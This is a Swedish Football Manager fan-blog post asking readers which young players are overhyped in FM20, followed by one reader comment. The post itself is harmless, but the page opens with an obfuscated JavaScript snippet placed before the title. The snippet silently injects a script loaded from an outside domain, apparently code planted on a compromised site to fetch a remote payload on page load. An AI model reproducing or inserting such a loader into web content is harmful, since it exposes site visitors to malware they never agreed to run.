;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Lirare vi minns: Vem är överhypad på FM20? – FMSweden
Meny Stäng

Lirare vi minns: Vem är överhypad på FM20?

Jag har skrivit i många veckor nu om lirare som jag minns från tidigare spel. Nu vill jag se om vi kan blicka in i spåkulan för en sekund. FM20 ska snart summeras och FM21 välkomnas in och därför tycker jag det kan värt att fundera en stund på vilka spelare som är årets upplaga av hypade talanger som om 10-15 år kanske är en lirare som vi minns? En lirare som blev väldigt bra i spelet men aldrig riktigt kunde infria dom förväntningarna i verkligheten.

Mitt bidrag blir 17-åriga Adam Hlozek från Sparta Prag. Han kan bli outstanding om du använder honom rätt men jag har svårt att se att han kommer bli så outstanding i verkligheten.

Vilka unga spelare har ni hittat som ni tror är överhypade i FM20?

Please wait...

Liknande Inlägg

4 kommentarer

  1. Micke

    Känns det inte lite som att Nils Fröling riskerar att bli en sådan spelare framöver? I en svensk kontext alltså. Nu har han förvisso varit skadad i princip hela säsongen, så det är svårt att bedöma hans kvalitet. Han har ju potential även IRL förstås men frågan är om han kan gå lika långt som på FM.

Lämna ett svar